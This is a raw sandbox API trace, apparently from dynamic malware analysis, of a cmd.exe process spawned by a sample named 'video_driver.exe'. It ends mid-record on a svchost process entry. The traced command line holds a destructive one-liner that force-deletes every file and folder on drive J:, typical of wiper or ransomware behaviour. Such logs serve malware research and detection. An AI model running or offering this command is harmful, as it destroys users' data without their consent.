[0062.771] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0062.772] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0062.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0062.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.773] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.773] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0062.774] GetEnvironmentStringsW () returned 0x7e20f8* [0062.774] GetProcessHeap () returned 0x7d0000 [0062.774] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xaca) returned 0x7e2bd0 [0062.774] FreeEnvironmentStringsW (penv=0x7e20f8) returned 1 [0062.775] GetProcessHeap () returned 0x7d0000 [0062.775] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x4) returned 0x7e1898 [0062.775] GetEnvironmentStringsW () returned 0x7e20f8* [0062.775] GetProcessHeap () returned 0x7d0000 [0062.775] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xaca) returned 0x7e36a8 [0062.775] FreeEnvironmentStringsW (penv=0x7e20f8) returned 1 [0062.775] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce9dc | out: phkResult=0x3ce9dc*=0x68) returned 0x0 [0062.775] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x0, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x1, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x1, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x0, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x40, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x40, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x40, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.776] RegCloseKey (hKey=0x68) returned 0x0 [0062.776] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3ce9dc | out: phkResult=0x3ce9dc*=0x68) returned 0x0 [0062.776] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x40, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x1, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x1, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x0, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x9, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x4, lpData=0x3ce9e8*=0x9, lpcbData=0x3ce9e0*=0x4) returned 0x0 [0062.777] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3ce9e4, lpData=0x3ce9e8, lpcbData=0x3ce9e0*=0x1000 | out: lpType=0x3ce9e4*=0x0, lpData=0x3ce9e8*=0x9, lpcbData=0x3ce9e0*=0x1000) returned 0x2 [0062.777] RegCloseKey (hKey=0x68) returned 0x0 [0062.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b68 [0062.777] srand (_Seed=0x5eb34b68) [0062.777] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" [0062.777] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"J:\" del /f /s /q \"J:\" & FOR /D %p IN (\"J:\") DO rmdir \"%p\" /s /q" [0062.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.778] GetProcessHeap () returned 0x7d0000 [0062.778] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x210) returned 0x7e20f8 [0062.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7e2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.779] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.779] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.779] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.779] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.779] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.779] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.779] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.779] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.779] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.779] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.779] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.779] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.779] GetProcessHeap () returned 0x7d0000 [0062.779] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e2bd0 | out: hHeap=0x7d0000) returned 1 [0062.779] GetEnvironmentStringsW () returned 0x7e2310* [0062.779] GetProcessHeap () returned 0x7d0000 [0062.779] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xae2) returned 0x7e4c70 [0062.780] FreeEnvironmentStringsW (penv=0x7e2310) returned 1 [0062.780] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.780] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.780] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.780] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.780] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.780] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.780] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.780] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.780] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.780] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.780] GetProcessHeap () returned 0x7d0000 [0062.780] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x54) returned 0x7e17c8 [0062.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3cf7a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.781] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3cf7a8, lpFilePart=0x3cf7a4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3cf7a4*="Desktop") returned 0x25 [0062.781] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.781] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3cf524 | out: lpFindFileData=0x3cf524*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x7e5760 [0062.781] FindClose (in: hFindFile=0x7e5760 | out: hFindFile=0x7e5760) returned 1 [0062.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3cf524 | out: lpFindFileData=0x3cf524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x7e5760 [0062.781] FindClose (in: hFindFile=0x7e5760 | out: hFindFile=0x7e5760) returned 1 [0062.782] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.782] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3cf524 | out: lpFindFileData=0x3cf524*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x7e5760 [0062.782] FindClose (in: hFindFile=0x7e5760 | out: hFindFile=0x7e5760) returned 1 [0062.782] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.782] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.782] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.782] GetProcessHeap () returned 0x7d0000 [0062.782] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e4c70 | out: hHeap=0x7d0000) returned 1 [0062.782] GetEnvironmentStringsW () returned 0x7e4180* [0062.783] GetProcessHeap () returned 0x7d0000 [0062.783] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xb36) returned 0x7e5fa0 [0062.783] FreeEnvironmentStringsW (penv=0x7e4180) returned 1 [0062.783] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.783] GetProcessHeap () returned 0x7d0000 [0062.783] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e17c8 | out: hHeap=0x7d0000) returned 1 [0062.783] GetProcessHeap () returned 0x7d0000 [0062.783] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x400e) returned 0x7e6ae0 [0062.784] GetProcessHeap () returned 0x7d0000 [0062.784] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xa0) returned 0x7e2e50 [0062.784] GetProcessHeap () returned 0x7d0000 [0062.784] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e6ae0 | out: hHeap=0x7d0000) returned 1 [0062.784] GetConsoleOutputCP () returned 0x1b5 [0062.784] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0062.784] GetUserDefaultLCID () returned 0x409 [0062.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0062.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3cf8e8, cchData=128 | out: lpLCData="0") returned 2 [0062.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3cf8e8, cchData=128 | out: lpLCData="0") returned 2 [0062.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3cf8e8, cchData=128 | out: lpLCData="1") returned 2 [0062.786] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0062.787] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0062.787] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.789] GetProcessHeap () returned 0x7d0000 [0062.789] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x0, Size=0x20c) returned 0x7e2ef8 [0062.790] GetConsoleTitleW (in: lpConsoleTitle=0x7e2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0062.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.790] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.790] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.790] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.791] GetProcessHeap () returned 0x7d0000 [0062.791] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x400a) returned 0x7e6ae0 [0062.792] GetProcessHeap () returned 0x7d0000 [0062.792] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x4008) returned 0x7eaaf8 [0062.792] GetProcessHeap () returned 0x7d0000 [0062.792] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x1a) returned 0x7e57e0 [0062.792] GetEnvironmentVariableW (in: lpName="p IN (\"J", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.792] _wcsicmp (_String1="p IN (\"J", _String2="CD") returned 13 [0062.792] _wcsicmp (_String1="p IN (\"J", _String2="ERRORLEVEL") returned 11 [0062.792] _wcsicmp (_String1="p IN (\"J", _String2="CMDEXTVERSION") returned 13 [0062.793] _wcsicmp (_String1="p IN (\"J", _String2="CMDCMDLINE") returned 13 [0062.793] _wcsicmp (_String1="p IN (\"J", _String2="DATE") returned 12 [0062.793] _wcsicmp (_String1="p IN (\"J", _String2="TIME") returned -4 [0062.793] _wcsicmp (_String1="p IN (\"J", _String2="RANDOM") returned -2 [0062.793] _wcsicmp (_String1="p IN (\"J", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.793] GetProcessHeap () returned 0x7d0000 [0062.793] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e57e0 | out: hHeap=0x7d0000) returned 1 [0062.793] GetProcessHeap () returned 0x7d0000 [0062.793] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7eaaf8 | out: hHeap=0x7d0000) returned 1 [0062.793] GetProcessHeap () returned 0x7d0000 [0062.793] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x4008) returned 0x7eaaf8 [0062.793] GetProcessHeap () returned 0x7d0000 [0062.793] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7eaaf8 | out: hHeap=0x7d0000) returned 1 [0062.793] GetProcessHeap () returned 0x7d0000 [0062.794] HeapFree (in: hHeap=0x7d0000, dwFlags=0x0, lpMem=0x7e6ae0 | out: hHeap=0x7d0000) returned 1 [0062.794] _wcsicmp (_String1="if", _String2=")") returned 64 [0062.794] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0062.794] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0062.794] _wcsicmp (_String1="IF", _String2="if") returned 0 [0062.794] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0062.794] GetProcessHeap () returned 0x7d0000 [0062.794] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e3110 [0062.794] GetProcessHeap () returned 0x7d0000 [0062.794] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0xe) returned 0x7dffc0 [0062.795] GetProcessHeap () returned 0x7d0000 [0062.795] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x20) returned 0x7e57e0 [0062.796] GetProcessHeap () returned 0x7d0000 [0062.796] RtlReAllocateHeap (Heap=0x7d0000, Flags=0x0, Ptr=0x7e57e0, Size=0x16) returned 0x7e1800 [0062.796] GetProcessHeap () returned 0x7d0000 [0062.796] RtlSizeHeap (HeapHandle=0x7d0000, Flags=0x0, MemoryPointer=0x7e1800) returned 0x16 [0062.796] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0062.797] GetProcessHeap () returned 0x7d0000 [0062.797] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e3170 [0062.797] GetProcessHeap () returned 0x7d0000 [0062.797] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x14) returned 0x7e31d0 [0062.797] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0062.798] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0062.798] GetProcessHeap () returned 0x7d0000 [0062.798] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x12) returned 0x7e31f0 [0062.798] GetProcessHeap () returned 0x7d0000 [0062.798] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x1c) returned 0x7e57e0 [0062.799] GetProcessHeap () returned 0x7d0000 [0062.799] RtlReAllocateHeap (Heap=0x7d0000, Flags=0x0, Ptr=0x7e57e0, Size=0x14) returned 0x7e3210 [0062.799] GetProcessHeap () returned 0x7d0000 [0062.799] RtlSizeHeap (HeapHandle=0x7d0000, Flags=0x0, MemoryPointer=0x7e3210) returned 0x14 [0062.799] _wcsicmp (_String1="del", _String2=")") returned 59 [0062.799] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0062.800] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0062.800] _wcsicmp (_String1="IF", _String2="del") returned 5 [0062.800] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0062.800] _wcsicmp (_String1="REM", _String2="del") returned 14 [0062.800] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0062.800] GetProcessHeap () returned 0x7d0000 [0062.800] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e3230 [0062.800] GetProcessHeap () returned 0x7d0000 [0062.800] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x10) returned 0x7dffd8 [0062.801] GetProcessHeap () returned 0x7d0000 [0062.801] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x28) returned 0x7e3290 [0062.803] GetProcessHeap () returned 0x7d0000 [0062.803] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e32c0 [0062.803] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0062.803] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0062.803] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0062.803] GetProcessHeap () returned 0x7d0000 [0062.803] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e3320 [0062.803] GetProcessHeap () returned 0x7d0000 [0062.804] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x44) returned 0x7e3380 [0062.804] GetProcessHeap () returned 0x7d0000 [0062.804] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x14) returned 0x7e33d0 [0062.804] GetProcessHeap () returned 0x7d0000 [0062.804] RtlReAllocateHeap (Heap=0x7d0000, Flags=0x0, Ptr=0x7e33d0, Size=0x12) returned 0x7e33d0 [0062.805] GetProcessHeap () returned 0x7d0000 [0062.805] RtlSizeHeap (HeapHandle=0x7d0000, Flags=0x0, MemoryPointer=0x7e33d0) returned 0x12 [0062.805] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0062.805] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0062.805] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0062.805] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0062.805] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0062.805] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0062.806] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0062.806] GetProcessHeap () returned 0x7d0000 [0062.807] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x12) returned 0x7e33f0 [0062.807] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0062.808] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0062.808] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0062.808] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0062.808] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0062.808] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0062.808] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0062.808] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0062.808] GetProcessHeap () returned 0x7d0000 [0062.808] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x58) returned 0x7e3410 [0062.808] GetProcessHeap () returned 0x7d0000 [0062.808] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x14) returned 0x7e3470 [0062.809] GetProcessHeap () returned 0x7d0000 [0062.809] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x8, Size=0x20) returned 0x7e57e0 [0062.811] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0062.814] GetFullPathNameW (in: lpFileName="J:", nBufferLength=0x208, lpBuffer=0x3cf5d8, lpFilePart=0x3cf384 | out: lpBuffer="J:\\", lpFilePart=0x3cf384*=0x0) returned 0x3 [0062.815] wcsncmp (_String1="J:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -18 [0062.820] GetFileAttributesW (lpFileName="J:\\" (normalized: "j:")) returned 0xffffffff [0062.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0062.881] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.881] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0062.882] SetConsoleInputExeNameW () returned 0x1 [0062.882] GetConsoleOutputCP () returned 0x1b5 [0062.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0062.882] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.882] exit (_Code=0) Process: id = "30" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "18" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT 